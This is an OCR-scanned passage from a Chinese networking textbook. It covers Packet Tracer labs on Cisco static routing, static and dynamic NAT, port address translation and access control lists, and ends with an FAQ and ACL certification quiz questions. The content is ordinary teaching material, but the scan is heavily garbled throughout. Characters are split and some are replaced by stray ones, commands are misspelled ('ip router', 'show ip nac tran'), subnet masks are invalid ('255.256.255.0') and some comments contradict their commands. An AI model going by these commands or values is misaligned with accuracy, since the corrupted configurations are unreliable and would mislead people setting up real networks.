Router2(config— if)# interface serial 0/1 // 打 开路 由 器 S 0/1 端口 
Router2(config- if)# ip address 202.202.202.1 255.255.255.0  // 配 置 IP 地 址 
Router2(config— if)#no shutdown 
Router2(config— if)#exit 
Router2(config)# ip route 200.200.200.0 255.255.255.0 202.202.202.2 

// 在 路 由 器 2 上 配置 去 往 主机 PC0 网 段 的 静态 路 由 
Router2(config) # ip route 210.210.210.0 255.255.255.0 201.201.201.1 

// 在 路 由 器 2 上 配置 去 往 公 司 服务 器 对 外 服务 网 段 的 静态 路 由 
Router2(config) # end 





Router2# show ip route // 查 看 路 由 表 

(7) 配置 路 由 器 3, 命 令 如 下 。 

Router3 > enable 

Router3# configure terminal // 进 入 全 局 配置 模式 
Router3(config) # interface fastethernet 0/0 // 打 开路 由 器 F 0/0 端口 


Router3(config- if)# ip address 200.200.200.1 255.255.255.0// 配 置 端口 IP 地 址 
Router3(config - if)#no shutdown 
Router3(config - if)# interface serial 0/0 // 打 开路 由 器 S 0/0 端口 
Router3(config- if)# ip address 202.202.202.2 255.255.255.0 // 配 置 IP 地 址 
Router3(config - if)no shutdown 
Router3(config— 证) # exit 
Router3(config) # ip route 199.199.199.0 255.255.255.0 202.202.202.1 
// 在 路 由 器 3 上 配置 去 往 DNS 服务 器 网 段 的 静态 路 由 
Router3(config) # ip route 210.210.210.0 255.255.255.0 202.202.202.1 
// 在 路 由 器 3 上 配置 去 往 公 司 服务 器 对 外 服务 网 段 的 静态 路 由 
Router3(config) # ip route 201.201.201.0 255.255.255.0 202.202.202.1 
// 在 路 由 器 3 上 配置 去 往 非 直 连 网 段 的 静态 路 由 
Router3(config) # end 
Router3# show ip route // 查 看 路 由 表 


(8) 验证 。 在 路 由 器 0 上 使 用 ping 命令 ,确认 与 主机 PC0 和 DNS 服务 器 的 网 络 连 
通 性 ,能 够 Ping 通 。 由 于 外 部 路 由 器 上 没有 内 网 的 寻 址 路 由 ,路 由 器 0 上 没有 配置 
NAT, 因 此 外 部 计算 机 无 法 访问 公司 内 部 资源 。 

(9) 在 路 由 器 0 上 配置 静态 NAT, 命 令 如 下 。 


Router0(config) # ip nat inside source static 192.168.1.2 210.210.210.1 
// 将 内 网 Web 服务 器 地 址 192.168.1.2 转换 成 外 网 地 址 210. 210. 210.1 
Router0(config)# #ip nat inside source static 192.168.1.3 210.210.210.2 
// 将 内 网 BBS 服务 器 地 址 192. 168.1.3 转换 成 外 网 地 址 210.210.210.2 
Router0(config) # interface serial 0/0 
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Router0(config- if)# ip nat outside 

Router0(config— if)#exit 

Router0(config) # interface fastethernet 0/0 

Router0(config— if)# ip nat inside 

Router0(config — if)#end 

(10) 测试 ,在 PC0 桌面 下 的 Web 浏览 器 中 输入 www. sdpt. com. cn、bbs. sdpt. com. 
cn, 浏 览 器 能 够 跳 转 ,打开 网 页 ,表明 外 部 主机 通过 NAT, 可 以 访问 内 网 资源 。 


{45 任务 5: 利用 Packet Tracer 配 置 路 由 器 的 动态 网 络 地 址 转换 
1. 任务 目标 


(1) 理解 动态 网 络 地 址 转换 的 原理 及 功能 。 
(2) 掌握 动态 NAT 的 配置 ,实现 公司 内 部 的 全 部 主机 通过 一 个 合法 公 网 IP 地 址 访 
问 远程 服务 器 。 


2. 案例 导入 


公司 办 公 需 要 接 入 互联 网 ,公司 只 向 ISP 申请 了 一 条 专线 ,该 专线 分 配 了 一 个 公 网 
IP 地 址 ,要 求 通过 配置 实现 内 部 公司 的 全 部 主机 通过 一 个 合法 的 公 网 IP 地 址 访问 远程 
服务 器 。 


3. 工作 环境 


(1) Windows 7 系统 的 主机 。 
(2) 主机 中 预 装 Packet Tracer 软件 。 


4. 任务 分 析 


路 由 器 Router0 为 公司 出 口 路 由 器 ,其 与 ISP 提供 商 路 由 器 之 间 通 过 V. 35 电缆 串 
口 连接 ,DCE 在 路 由 器 Routerl 上 ,配置 其 时 钟 频 率 为 64000Hz。 在 各 路 由 器 上 配置 静 
态 路 由 协议 ,让 PC1 能 和 Web 服务 器 相互 Ping 通 。 在 Router0 出 口 路 由 器 上 配置 标准 
或 扩展 访问 控制 列表 ,配置 动态 NAPT, 将 访问 控制 列表 映射 到 NAT 地 址 池 中 ,实现 公 
司 内 部 的 全 部 主机 可 以 通过 一 个 合法 的 公 网 IP 地 址 访问 远程 服务 器 的 IP 地 址 。 它 们 的 
IP 地 址 信息 如 表 16-10 所 示 。 网 络 拓扑 图 如 图 16-8 所 示 。 


表 16-10 任务 5 主机 与 服务 器 IP 地 址 信息 表 


























设备 名 称 了 PC0 PC1 Web 服务 器 
IP 地 址 192. 168. 1.2 192. 168. 2. 2 192. 168. 3.2 
子 网 掩 码 255. 255. 255. 0 255. 255. 255. 0 255. 255. 255.0 
网 关 192. 168. 1. 1 192. 168. 2. 1 192. 168. 3. 1 


(1) 主机 与 路 由 器 之 间 使 用 交叉 线 相连 ,Web 服务 器 与 路 由 器 用 交叉 线 相连 ,路 由 器 
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图 16-8 任务 5 网 络 拓扑 图 
与 路 由 器 之 间 用 串口 线 相连 。 


(2) 按照 主机 与 服务 器 的 IP 地 址 信息 表 配 置 主机 和 3 台 服 务 器 的 IP 地 址 、 子 网 掩 
码 和 网 关 , 如 表 16-11 所 示 。 


表 16-11 任务 5 路 由 器 端口 IP 地 址 信息 表 








设备 名 称 Router0 Router0 Routerl Routerl Routerl 
端口 F 0/0 端口 S0/0 端口 F 0/0 端口 F 0/1 端口 S 0/0 

IP 地 址 192. 168. 3. 1 200. 200. 200. 1 | 192. 168. 1. 1 192. 168. 2. 1 200. 200. 200. 2 

子 网 掩 码 | 255. 255. 255.0 | 255. 255. 255. 0 | 255. 255. 255.0 | 255. 255. 255.0 | 255. 255. 255.0 

















(3) 配置 路 由 器 Router0 ,命令 如 下 。 


Router0 > enable 
Router0# configure terminal // 进 入 全 局 配置 模式 
Router0(config) # interface fastethernet 0/0 // 打 开路 由 器 F 0/0 端口 


Router0(config - if)# ip address 192.168.3.1 255.255.255.0  // 配 置 IP 地 址 
Router0(config - if)#no shutdown 


Router0(config - if) # interface serial 0/0 

Router0(config- if)# ip address 200.200.200.1 255.255.255.0 // 配 置 IP 地 址 
Router0(config- if)#clock rate 64000 

Router0(config- if)#no shutdown 

Router0(config— if)#exit 


(4) 配置 路 由 器 Routerl ,命令 如 下 。 


Routerl > enable 
Routerl # configure terminal // 进 入 全 局 配置 模式 
Routerl (config) # interface fastethernet 0/0 // 打 开路 由 器 F 0/0 端口 
Routerl(config— if)# ip address 192.168.1.1 255.255.255.0  // 配 置 IP 地 址 
Routerl(config— if)# ip nat inside 

Routerl(config - if)#no shutdown 

Routerl(config) # interface fastethernet 0/1 // 打 开路 由 器 F 0/1 端口 
Routerl(config— if)# ip address 192.168.2.1 255.255.255.0  // 配 置 IP 地 址 
Routerl(config— if)# ip nat inside 


Routerl (config— if)#no shutdown 
Routerl(config — if)# interface serial 0/0 
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Routerl(config- 证 ) 上 # ip address 200.200.200.2 255.255.255.0 // 配 置 IP 地 址 
Routerl(config— if)#clock rate 64000 

Routerl(config- if)# ip nat outside 

Routerl(config- if)#no shutdown 

Routerl(config— if)#exit 

Routerl(config)#access— list 1 deny 192.168.1.0 0.0.0.255 

Routerl(config) # access 一 list 1 permit 192.168.2.0 0.0.0.255 
Router1l(config) # ip nat pool internetpool 200. 200. 200.10 200.200.200.20 netmask 255. 255. 
255.0 

Routerl(config) # ip nat inside source list 1 pool internetpool 
Routerl(config) # ip route 0.0.0.0 0.0.0.0 200.200.200.1 // 配 置 静态 路 由 
Routerl(config) # end 


(5) 验证 2 台 主 机 与 服务 器 之 间 的 网 络 连通 性 ,PC0 由 于 受到 访问 控制 列表 的 限制 ， 
所 以 不 能 进行 动态 NAT, 从 而 也 就 不 能 与 Web 服务 器 通信 ,如 图 16-9 所 示 。PC1 能 够 
通过 动态 NAT 与 Web 服务 器 通信 ,如 图 16-10 所 示 。 
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图 16-9 PC0 与 Web 服务 器 通信 测试 
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图 16-10 PC1 与 Web 服务 器 通信 测试 


(6) 查看 路 由 器 Routerl 上 的 NAT 情况 ,如 图 16-11 所 示 , 动 态 NAT 把 内 部 的 
192. 168. 2. 1 映射 到 地 址 池 中 的 200. 200. 200. 10 ,并 与 Web 服务 器 通信 。 


Router#show ip nac tran 
Pro Inside global Inside local Outside local Outside global 
tcp 200.200.200.10:1025192.168.2.2:1025 192.168.3.2:80 192.168.3.2:80 


图 16-11 路 由 器 Routerl 上 的 NAT 情况 











LE Goo mg 和 版 )] 


{46 任务 6: 利用 Packet Tracer 配 置 路 由 器 的 端口 地 址 转换 
1. 任务 目标 


(1) 理解 路 由 器 端口 地 址 转换 的 原理 及 功能 。 
(2) 掌握 路 由 器 端口 地 址 转换 的 配置 ,实现 公司 内 部 的 全 部 主机 通过 一 个 合法 公 
IP 地 址 访问 远程 服务 器 。 


2. 案例 导入 


公司 办 公 需 要 接 人 互联 网 ,公司 只 向 ISP 申请 了 一 条 专线 ,该 专线 分 配 了 公 网 IP 地 
址 ,要 求 通过 配置 实现 公司 内 部 的 全 部 主机 通过 合法 的 公 网 IP 地 址 访问 远程 服务 器 。 


3. 工作 环境 


(1) Windows 7 系统 的 主机 。 
(2) 主机 中 预 装 Packet Tracer 软件 。 


4. 任务 分 析 


当 ISP 分 配 的 IP 地 址 数量 很 少 , 网 络 又 没有 其 他 特殊 需求 , 即 无 须 为 Internet 提供 
网 络 服务 时 , 可 采用 端口 地 址 转换 方式 。 使 网 络 内 的 计算 机 采用 同一 IP 地 址 访问 
ternet, 在 节约 IP 地 址 资源 的 同时 ,又 可 有 效 保护 网 络 内 部 的 计算 机 。 局 域 网 采用 
10Mb/s 光纤 ,以 城 域 网 方式 接 人 Internet。 路 由 器 选用 拥有 两 个 10/100Mb/s 自 适 应 端 
口 的 Cisco 2621XM。 内 部 网 络 使 用 的 IP 地址 段 为 192. 168. 1. 1 一 192. 168. 1.254。 公 网 
分 配 的 合法 IP 地 址 范围 为 200. 200. 200. 1 一 200. 200. 200. 3。 因 为 服务 器 又 只 为 局 域 网 
提供 服务 ,而 不 允许 互联 网 中 的 主机 对 其 访问 ,因此 完全 可 以 采用 端口 复 用 地 址 转换 方式 
实现 NAT, 使 得 网 络 内 的 所 有 计算 机 均 可 以 独立 访问 远程 服务 器 ,网 络 拓扑 图 如 
图 16-12 所 示 。 
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图 16-12 任务 6 路 由 器 端口 地 址 转换 网 络 拓扑 图 


(1) 主机 与 交换 机 之 间 使 用 直通 线 相连 ,Server0 与 路 由 器 用 交叉 线 相连 ,交换 机 与 
路 由 器 之 间 用 直通 线 相连 ,路 由 器 与 路 由 器 之 间 用 串口 线 相连 。 
(2) 按照 主机 与 服务 器 的 IP 地 址 信息 表 ( 见 表 16-12) 配 置 主机 和 3 台 服 务 器 的 IP 
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地 址 、 子 网 掩 码 和 网 关 , 如 表 16-13 所 示 。 
表 16-12 任务 6 主机 与 服务 器 IP 地 址 信息 表 









































设备 名 称 PC0 PC1 PC2 Server-PT 

IP 地 址 192.168.1.2 192. 168.1.3 192. 168. 1. 4 210. 210. 210. 2 
子 网 掩 码 255. 255. 255. 0 255. 255. 255.0 255. 255. 255. 0 255. 255. 255. 0 
网 关 192. 168.1.1 192. 168.1.1 192. 168.1.1 210. 210. 210.1 

表 16-13 任务 6 路 由 器 端口 IP 地 址 信息 表 

设备 名 称 Router0 端口 F 0/0 | Router0 端口 S 0/0 | Routerl 端口 F 0/0 |Routerl 端口 S 0/0 
IP 地 址 192. 168. 1.1 200. 200. 200.1 210. 210. 210.1 200. 200. 200.2 
子 网 掩 码 255. 255. 255. 0 2355. 255. 255.0 255. 255. 255. 0 255. 255. 255. 0 

















(3) 配置 路 由 器 Router0 ,命令 如 下 。 


Router0 > enable 


Router0# configure terminal // 进 入 全 局 配置 模式 
Router0(config) # interface fastethernet 0/0 // 打 开路 由 器 F 0/0 端口 
Router0(config- if)#ipaddress 192.168.1.1 255.255.255.0  // 配 置 IP 地 址 


Router0(config— if)#no shutdown 

Router0(config— if)# ip nat inside 

Router0(config— if)#exit 

Router0(config) # interface serial 0/0 

Router0(config- if) # ip address 200.200.200.1 255.255.255.0 // 配 置 IP 地 址 
Router0(config— if)#clock rate 64000 

Router0(config - if)#no shutdown 

Router0(config— if)# ip nat outside 

Router0(config— if)#exit 

Router0(config) # ip router 210.210.210.0 255.255.255.0 200.200.200.2 
Router0(config) # access - list 1 permit 192.168.1.0 0.0.0.255 
Router0(config) # ip nat pool poolwai 200.200.200.3 200.200.200.3 netmask 255.255.255.0 
Router0(config) # ip nat inside source list 1 pool poolwai overload 


(4) 配置 路 由 器 Routerl ,命令 如 下 。 


Routerl > enable 

Routerl # configure terminal // 进 入 全 局 配置 模式 
Routerl(config) # interface fastethernet 0/0 // 打 开路 由 器 F 0/0 端口 
Routerl(config- if)#ipaddress 210.210.210.1 255.255.255.0 // 配 置 IP 地 址 
Routerl(config - if) # no shutdown 

Routerl(config - if)#exit 

Routerl(config) # interface serial 0/0 

Router1l(config - if)# ip address 200.200.200.2 255.255.255.0 // 配 置 IP 地 址 
Router1l(config - if)#clock rate 64000 

Routerl(config - 计 ) # no shutdown 

Routerl(config- if)#end 


(5) 测试 。 在 PC0 上 Ping 服务 器 能 够 Ping 通 ,在 PCO 上 的 Web 浏览 器 中 输入 地 址 
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http://210. 210. 210. 2 能 够 顺利 打开 网 页 ,在 PC1 上 的 Web 浏览 器 中 输入 地 址 http:// 
210. 210. 210. 2 也 能 够 顺利 打开 网 页 。 

(6) 查看 路 由 器 Router0 上 的 NAT 情况 。 在 路 由 器 Router0 的 特权 模式 下 输入 
show ip nat translation 命令 ,可 以 看 到 PC0 和 PC1 都 通过 IP 地 址 200. 200. 200. 3 访问 
了 Web 服务 器 ,实现 了 端口 地 址 转换 ,如 图 16-13 所 示 。 

Router>en 
Router#show ip nat translation 
Pro Inside global Inside local Outrside local Outrside global 


zcp 200.200.200.3:1024 192.168.1.3:1025 210.210.210.2:80 210.210.210.2:80 
zcp 200.200.200.3:1025 192.168.1.2:1025 210.210.210.2:80 210.210.210.2:80 


图 16-13 路 由 器 Router0 上 的 端口 地 址 转换 情况 


47 任务 7: 利用 Packet Traoer 配置 路 由 器 的 访问 控制 列表 和 端口 
地 址 转换 


1. 任务 目标 


(1) 理解 网 络 地 址 转换 的 原理 及 功能 。 
(2) 理解 访问 控制 列表 的 原理 及 功能 。 
(3) 掌握 端口 NAT 和 ACL 的 配置 的 综合 应 用 。 


2. 案例 导入 


公司 办 公 需 要 接 入 互联 网 ,公司 只 向 ISP 申请 了 一 条 专线 ,该 专线 分 配 了 公 网 IP 地 
址 ,要 求 通过 配置 实现 公司 内 部 的 全 部 主机 通过 合法 的 公 网 IP 地 址 访问 远程 服务 器 ,外 
网 主机 使 用 公 网 地 址 访问 企业 Web 服务 器 ,限制 企业 内 部 某 台 主机 与 外 网 的 通信 。 


3. 工作 环境 


(1) Windows 7 系统 的 主机 。 
(2) 主机 中 预 装 Packet Tracer 软件 。 


4. 任务 分 析 


利用 Packet Tracer 软件 模拟 企业 与 外 部 网 络 的 连接 ,网 络 拓扑 图 如 图 16-14 所 示 。 
PC0、PCl 和 Server0(Web 服务 器 ) 所 在 网 络 代表 企业 网 络 ,PC2 所 在 网 络 代 表 外 部 网 络 
中 的 主机 。 在 路 由 器 Router0 中 配置 NAT 和 ACL 使 得 PC0、PCl 和 Server0 通过 NAT 
后 可 以 访问 外 网 主机 PC2; PCO 和 PC1 可 以 利用 内 网 地 址 去 访问 Web 服务 器 ; 外 网 主 
机 PC2 也 可 以 访问 Web 服务 器 ,但 需要 通过 其 公 网 地 址 去 访问 。 另 外 配置 ACL 功能 ， 
仅 不 允许 PC1 和 PC2 进行 ICMP 通信 。 


5. 实施 过 程 


(1) 主机 与 交换 机 之 间 使 用 直通 线 相连 ,Server0 与 路 由 器 用 交叉 线 相连 ,交换 机 与 
路 由 器 之 间 用 直通 线 相连 ,主机 与 路 由 器 之 间 用 交叉 线 相连 。 
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图 16-14 任务 7 路 由 器 端口 地 址 转换 网 络 拓扑 图 
(2) 按照 主机 与 服务 器 的 IP 地 址 信息 表 ( 见 表 16-14) 配 置 主机 和 服务 器 的 IP 地 址 、 


子 网 掩 码 和 网 关 , 如 表 16-15 所 示 。 


表 16-14 任务 7 主机 与 服务 器 IP 地 址 信息 表 























设备 名 称 PC0 PC Server0 PC2 

IP 地 址 192.168.1.2 192. 168.1.3 192. 168. 2.2 200. 200. 200.2 
子 网 掩 码 255. 255. 255.0 255. 255. 255. 0 255. 256.255.0 255. 255. 255. 0 
网 关 192.168.1.1 192. 168.1.1 192. 168. 2.1 200. 200. 200. 1 


表 16-15 任务 7 路 由 器 端口 IP 地 址 信息 表 











设备 名 称 Router0 端口 F 0/0 Router0 端口 F 1/0 Router0 端口 F 6/0 
IP 地 址 192. 168.1.1 192. 168. 2.1 200. 200. 200. 1 
子 网 掩 码 255, 255, 255.0 255. 255. 255.0 255.256.255.0 








(3) 配置 路 由 器 Router0 ,命令 如 下 。 


Router0 > enable 
Router0# configure terminal // 进 入 全 局 配置 模式 
Router0(config) # interface fastethernet0/0 // 打 开路 由 器 F 0/0 端口 
Router0(config— if)# ip address 192.168.1.1 255.255.255.0  // 配 置 IP 地 址 
Router0(config- if) 上 # ip access- group 110 in // 符 合 110 列表 规则 的 数据 包 进 入 F 0/0 时 进 
// 行 相应 的 访问 控制 
Router0(config - if)# ip nat inside // 端 口 F 0/0 为 NAT 的 内 部 
Router0(config - if)#exit 
Router0(config) # interface fastethernet1/0 
Router0(config- if)# ip address 192.168.2.1 255.255.255.0 
Router0(config- if)# ip nat inside // 端 口 F 6/0 为 NAT 的 内 部 
Router0(config - if)#exit 
Router0(config) # interface fastethernet6/0 
Router0(config- 证 ) # ip address 200.200.200.1 255.255.255.0 
Router0(config- if)# ip nat outside // 端 口 F1/0 为 NAT 的 外 部 
Router0(config— if)# ip nat inside source list 10 interface fastethernet 6/0 overload 
// 对 于 列表 10 中 定义 的 源 地 址 进行 动态 复 用 NAT(PAT) ,并 都 转换 成 F 6/0 端口 的 公 网 地 址 
Router0(config) # ip nat inside source static 192.168.2.2 200.200.200.3 
// 定 义 Web 服务 器 的 静态 转换 地 址 
Router0(config) #access— list 10 permit 192.168.1.0 0.0.0.255 
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// 定 义 NAT 的 源 地 址 
Router0(config) #access — list 10 permit 192.168.2.0 0.0.0.255 
// 定 义 NAT 的 源 地 址 
Router0(config) #access— list 110 deny icmp host 192.168.1.3 host 200.200.200.2 
// 禁 止 主机 PC1 与 主机 PC2 进行 ICMP 通信 
Router0(config) #access— list 110 permit ip any any 
// 允 许 主机 PC1 以 外 的 主机 进行 I 通信 


(4) 对 NAT 的 检查 与 测试 。 在 主机 PCO 上 Ping 主机 PC2 ,正常 为 连通 状态 ,但 主 
机 PC2 上 Ping 主机 PC0 是 不 通 的 ,因为 NAT 屏蔽 了 内 部 主机 。 此 时 证 明 动 态 NAT 设 
置 是 正确 的 。 

(5) 对 Web 服务 器 访问 的 检查 与 测试 。 分 别 在 主机 PC0 和 主机 PC2 上 访问 Web 服 
务 器 ,PC0 访问 Web 服务 器 的 内 网 IP 地 址 是 192. 168. 2. 2 ,而 主机 PC2 访问 Web 服务 
器 外 网 静态 NAT 后 的 IP 地 址 为 200. 200. 200. 3 ,如 果 能 分 别 Ping 通 , 则 说 明 对 Web 服 
务 器 的 一 对 一 静态 NAT 配置 正确 。 

(6) 进行 访问 控制 效果 检测 : 分 别 在 主机 PC0 和 主机 PC1 上 Ping 主机 PC2 ,检查 连 
通 性 ,配置 正确 后 PC1 应 该 无 法 与 PC2 进行 基于 ICMP 协议 的 通信 ,而 主机 PCO 和 路 由 
器 接口 的 IP 都 可 以 跟 PC2 进行 基于 ICMP 协议 的 通信 。 


16.5 常见 问题 解答 


1. 访问 控制 列表 的 配置 原则 是 什么 ? 

答 : 访问 控制 列表 是 路 由 器 接口 的 指令 列表 ,用 来 控制 端口 进出 的 数据 包 。ACL 默 
认 执 行 顺序 是 自 上 而 下 。 在 配置 ACL 时 ,要 遵循 最 小 特权 原则 、 最 靠近 受 控 对 象 原 则 以 
及 默认 丢弃 原则 。 其 中 ,最 小 特权 原则 是 指 只 给 受 控 对 象 完成 任务 所 必需 的 最 小 的 权限 ， 
即 被 控制 的 总 规则 是 各 个 规则 的 交集 ,只 满足 部 分 条 件 的 是 不 允许 通过 规则 的 。 最 靠近 
受 控 对 象 原则 是 对 所 有 的 网 络 层 访问 权限 进行 控制 ,也 就 是 说 在 检查 规则 时 是 采用 自 上 
而 下 在 ACL 中 逐条 检测 的 ,只 要 发 现 符合 条 件 就 立刻 转发 ,而 不 继续 检测 下 面 的 ACL 
语句 。 默 认 丢 弃 原 则 是 指 在 路 由 交换 设备 中 ,默认 最 后 一 条 ACL 语句 是 deny any any， 
即 丢弃 所 有 不 符合 条 件 的 数据 包 。 

2. 如 果 Packet Tracer 软件 中 路 由 器 的 以 太 网 端口 不 够 ,该 如 何 操作 ? 

答 : 如 果 路 由 器 的 以 太 网 端口 不 够 ,可 以 先 移 除 两 个 串口 后 再 添加 两 个 以 太 网 端口 。 
单 击 图 16-15 中 的 电源 开关 关闭 路 由 器 电源 ,选择 图 16-15 中 左 侧 模块 中 的 RT- 
ROUTER-NM-1CFE, 再 拖 动 图 16-15 中 右 下 角 的 图 标 到 路 由 器 图 中 的 空 插 槽 处 即 可 。 
都 添加 完成 后 再 单 击 电源 开关 开启 路 由 器 电源 ,选择 “命令 行 ?选项 卡 即 可 进行 路 由 器 的 
命令 行 配置 。 


是 ( 
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PT-ROUTER-NM-1CFE 特 性 :该 模块 提供 一 个 支持 铜 介质 的 快速 以 太 网 接口 。 适 合 寺 组 建 远 距 


离 局 域 网 应 用 ， 快 速 以 太 网 模块 支持 多 种 特性 和 标准 。 单 端口 的 网 络 模 块 支持 10/100BaseTX 
自 适应 ， 或 者 100BaseFX 光 纤 以 太 网 。TX( 铜 介质 ) 的 版 本 支持 虚拟 局 域 网 扩展 。 





图 16-15 ”Packet Tracer 软件 设备 的 物理 配置 


16.6 认证 试题 


、 选 择 题 


访问 控制 列表 的 作用 是 ( 和 

A. 安全 控制 B. 流量 过 滤 

C. 数据 流量 标识 D. 流 媒 体 传输 服务 

访问 控制 列表 分 为 标准 和 扩展 两 种 。 下 面 关 于 ACL 的 描述 中 ,错误 的 是 ( 站 
A. 标准 ACL 可 以 根据 分 组 中 的 IP 源 地 址 进行 过 滤 

B. 扩展 ACL 可 以 根据 分 组 中 的 IP 目标 地 址 进行 过 滤 

C. 标准 ACL 可 以 根据 分 组 中 的 IP 目标 地 址 进行 过 滤 

D. 扩展 ACL 可 以 根据 不 同 的 上 层 协议 信息 进行 过 滤 


. 标准 访问 控制 列表 以 ( ) 作 为 判别 条 件 。 


A. 数据 包 大 小 B. 数据 包 的 源 地 址 
C. 数据 包 的 端口 号 D. 数据 包 的 目标 地 址 


. 路 由 器 命令 Router (config) # access-list 1 permit host 192. 168. 1. 1 的 含义 


Sa 

A. 不 允许 源 地 址 为 192. 168. 1. 1 的 分 组 通过 ,如 果 分 组 不 匹配 , 则 结束 

B. 允许 源 地 址 为 192. 168. 1. 1 的 分 组 通过 ,如 果 分 组 不 匹配 , 则 检查 下 一 条 语句 
C. 不 允许 目标 地 址 为 192. 168. 1. 1 的 分 组 通过 ,如 果 分 组 不 匹配 , 则 结束 

D. 允许 目标 地 址 为 192. 168. 1. 1 的 分 组 通过 ,如 果 分 组 不 匹配 , 则 检查 下 一 条 
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语句 
5. 某 路 由 器 上 配置 了 如 下 两 个 访问 控制 列表 ,表示 的 含义 是 ( 六 
Router(config) # access- list 1 deny 192.168.1.0 0.0.0.255 
Router(config) # access 一 list 1 permit 10.0.0.0 0.255.255.255 
A. 只 禁止 源 地 址 为 192. 168. 1. 0 网 段 的 分 组 通过 
B. 只 允许 源 地 址 为 10. 0. 0. 0 网 段 的 分 组 通过 
C. 检查 源 IP 地 址 ,禁止 192. 168. 1. 0 网 段 的 分 组 通过 ,允许 10. 0. 0. 0 网 段 的 
分 组 
D. 检查 目标 IP 地 址 ,禁止 192. 168. 1. 0 网 段 的 分 组 ,但 允许 10. 0. 0. 0 网 段 的 
分 组 
6. 配置 如 下 两 条 访问 控制 列表 .ACL1 和 ACL2 所 控制 地 址 范围 关系 是 ( )。 
Router(config)#access— list 1 permit 10.10.10.1 0.0.255.255 
Router(config)#access— list 2 permit 10.10.100.1 0.0.255.255 
A. 1 和 2 的 范围 相同 
B. 1 的 范围 在 2 的 范围 内 
C. 2 的 范围 在 1 的 范围 内 
D. 1 的 范围 和 2 的 范围 没有 任何 包含 关系 
7. 以 下 为 标准 访问 控制 列表 的 命令 是 ( 
A. Router(config)#access-list 1 permit host 192. 168. 1. 2 
B. Router(config)#access-list 2 deny 192. 168. 1. 3 
C. Router(config)#access-list 3 permit 192. 168. 1.0 255. 255. 255. 0 
D. Router(config)#access-list standard 192. 168. 1. 4 
8. 在 路 由 器 上 配置 一 个 标准 的 访问 控制 列表 ,只 允许 所 有 源 自 己 类 地 址 172. 16. 0. 0 
的 IP 数据 包 通 过 ,那么 反 掩 码 (Wildcard-Mask) 采 用 ( ) 是 正确 的 。 
A. 255. 255. 0.0 B，255. 255. 255. 0 
C. 0.0.255.255 D. 0.255.255.255 
9. 配置 访问 控制 列表 的 先后 顺序 ,会 影响 访问 控制 列表 的 匹配 效率 ,因此 ( )。 
A. 最 常用 的 需要 匹配 的 列表 在 前 面 输入 
B. 最 常用 的 需要 匹配 的 列表 在 后 面 输入 
C. deny 在 前 面 输入 
D. permit 在 前 面 输入 
10. 下 列 条 件 中 ,能 用 作 标 准 访问 控制 列表 决定 报 文 是 转发 还 是 丢弃 的 匹配 条 件 有 
( 》。 
A. 源 主 机 IP B. 目标 主机 IP C. 协议 类 型 D. 协议 端口 号 
11. 将 ACL 应 用 到 路 由 器 端口 的 命令 是 ( )。 
A. Router(config-if)# ip access-group 10 out 
B. Router(Cconfig-if) #apply accss-list 10 out 








C. Router(config-if) # fixup access-list 10 out 

D. Router(config-if)# router access-group 10 out 
12. 路 由 器 验证 端口 的 ACL 应 用 ( ”“) 命 令 。 

A. show int B. show ip int 

C. show ip D. show access-list 
13. ip access-group {number} in 命令 的 含义 是 ( »: 

A. 指定 端口 上 使 其 对 输入 该 端口 的 数据 流 进行 接 入 控制 

B. 取消 指定 端口 上 使 其 对 输入 该 端口 的 数据 流 进行 接 入 控制 

C. 指定 端口 上 使 其 对 输出 该 端口 的 数据 流 进行 接 入 控制 

D. 取消 指定 端口 上 使 其 对 输出 该 端口 的 数据 流 进行 接 入 控制 
14. 在 配置 访问 控制 列表 时 ,以 下 描述 不 正确 的 是 ( 

A. 加 入 的 规则 都 被 追加 到 访问 控制 列表 的 最 后 

B. 加 入 的 规则 可 以 根据 需要 插入 到 任意 位 置 

C. 修改 现 有 的 访问 控制 列表 需要 删除 并 重新 配置 

D. 访问 控制 列表 按照 顺序 检查 直到 找到 匹配 的 规则 
15. 访问 控制 列表 时 路 由 器 的 一 种 安全 策略 ,如 果 决 定 使 用 标准 IP 访问 控制 列表 来 

做 安全 控制 ,以 下 为 标准 IP 访问 控制 列表 的 选项 是 ( )。 

A. Router(config)#access-list standard 192. 168. 1. 2 

B. Router(config)#access-list 10 deny 192. 168. 1. 3 0. 0.0.0 

C. Router(config)#access-list 101 deny 192. 168. 1. 4 0. 0. 0.0 

D. Router(Cconfig) # access-list 101 deny 192. 168. 1. 4 255. 255. 255. 255 
16. 配置 访问 控制 列表 如 下 所 示 , 其 默认 的 规则 是 ( 


Router(config)#access— list 101 permit 192.168.0.0 0.0.0.255 10.0.0.0 0.255.255.255 


A. 允许 所 有 的 数据 包 通 过 

B. 仅 允 许 到 10. 0. 0. 0 的 数据 包 通 过 

C. 拒绝 所 有 数据 包 通 过 

D. 仅 允 许 到 192. 168. 0. 0 的 数据 包 通 过 
17. 扩展 IP 访问 控制 列表 的 号 码 范围 是 ( Ns 

A. 1~99 B. 100~199 C. 800~899 D. 900~999 
18. 以 下 描述 中 ,访问 控制 列表 不 能 实现 的 是 ( J 

A. 拒绝 从 一 个 网 段 到 另 一 个 网 段 的 Ping 流量 

B. 禁止 客户 端 向 某 个 非法 DNS 服务 器 发 送 请 求 

C. 禁止 以 某 个 IP 地 址 作为 源 发 出 的 Telnet 流量 

D. 禁止 某 些 空 户 端的 P2P 下 载 应 用 
19. 某 路 由 器 上 配置 了 如 下 访问 控制 列表 ,其 含义 是 ( js 


Router(config) #access— list 102 deny udp 10. 10. 10. 10 0. 0. 0. 255 20. 20. 20. 20 0. 0. 0. 255 
gt 128 
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A. 禁止 从 20. 20. 20. 0/24 网 段 的 主机 到 10. 10. 10. 0/24 网 段 的 主机 使 用 端口 
号 大 于 128 的 UDP 进行 连接 
B. 禁止 从 20. 20. 20.0/24 网 段 的 主机 到 10. 10. 10. 0/24 网 段 的 主机 使 用 端口 
号 小 于 128 的 UDP 进行 连接 
C. 禁止 从 10. 10. 10. 0/24 网 段 的 主机 到 20. 20. 20. 0/24 网 段 的 主机 使 用 端口 
号 大 于 128 的 UDP 进行 连接 
D. 禁止 从 10. 10. 10. 0/24 网 段 的 主机 到 20. 20. 20. 0/24 网 段 的 主机 使 用 端口 
号 小 于 128 的 UDP 进行 连接 
20. 以 下 ACL 语句 中 ,含义 为 “允许 172. 168. 0. 0/24 网 段 所 有 PC 访问 10. 1. 0. 10 
中 的 FTP 服务 的 是 (  )。 
A. access-list 101 deny tcp 172. 168. 0. 0 0. 0. 0. 255 host 10. 1. 0. 10 eq ftp 
B. access-list 101 permit tcp 172. 168. 0. 0 0. 0. 0. 255 host 10. 1. 0. 10 eq ftp 
